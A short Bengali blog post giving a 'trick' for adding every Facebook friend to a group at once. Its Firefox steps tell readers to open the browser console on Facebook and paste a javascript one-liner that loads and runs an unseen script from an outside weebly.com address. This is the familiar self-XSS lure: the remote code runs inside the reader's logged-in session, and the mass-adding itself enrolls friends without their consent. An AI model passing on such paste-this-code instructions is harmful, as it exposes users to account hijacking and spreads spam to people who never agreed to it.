সবাইকে সালাম ও শুভেচ্ছা জানাই। আমি আগের এক টিউনে দেখিয়েছিলাম কিভাবে মাত্র এক ক্লিকেই ফেসবুকের পেজে Invite করা যায়। আজ নিয়ে আসলাম আরেকটা ট্রিকস, এতে দেখবেন কিভাবে ফেসবুকে সবাইকে এক সাথে গ্রুপে অ্যাড করবেন। অনেকের দেখা যায় হাজারেরও বেশি ফ্রেন্ড থাকে ফেসবুকে। এক এক করে সবাইকে গ্রুপে অ্যাড করার চেয়ে সবাইকে একসাথে অ্যাড করাই ভাল, তাই না? চাহলে চলুন দেখি কিভাবে একসাথে গ্রপে সবাইকে অ্যাড করবেন।
Google Chrome এর জন্যঃ
১.প্রথমে এই Extension টি Add করে নিন আপনার Google Chrome এ। Add করার সাথে সাথে ব্রাউজারের ডানদিকে Extension টির একটি Button আসবে।
২.তারপর আপনার ফেসবুক অ্যাকাউন্টে যান।
৩.যেই গ্রুপে সবাইকে একসাথে যোগ করতে চান সেই গ্রুপে যান।
৪.তারপর উপরের Extension এর Button টাতে ক্লিক করুন।
ব্যাস। কাজ শেষ, গ্রুপ Refresh করে দেখুন সবাই আপনার কাঙ্ক্ষিত গ্রুপে যুক্ত হয়ে গেছে।
Mozilla Firebox এর জন্যঃ
১.প্রথমে Mozilla Firebox Open করুন।
২.তারপর আপনার ফেসবুক অ্যাকাউন্টে যেয়ে যেই গ্রুপে সবাইকে একসাথে যোগ করতে চান সেই গ্রুপে যান।
৩. তারপর চাপুন Ctrl + Shift + K.একটি বক্স Open হবে।
৪.তারপর বক্সটিতে নিচের কোডটি Paste করে দিন।
javascript:(function(){document.body.appendChild(document.createElement(‘script’)).src=’http://www.weebly.com/uploads/1/5/4/8/15485034/bappi.js‘;})();
৫.Enter চাপুন। তারপর আপনার সব ফ্রেন্ড গ্রুপে Add না হওয়া পর্যন্ত একটু অপেক্ষা করুন। কিছুক্ষণ পড়ে দেখবেন আপনার সব বন্ধু আপনার কাঙ্ক্ষিত গ্রুপটিতে যুক্ত হয়ে গেছে।
৬.বক্সটি Hide করতে আবার চাপুন Ctrl + Shift + K.
কাজ শেষ। আজকের মত এখানেই বিদায়। সবাই ভাল থাকুন। আল্লাহ হাফেয।
 
Top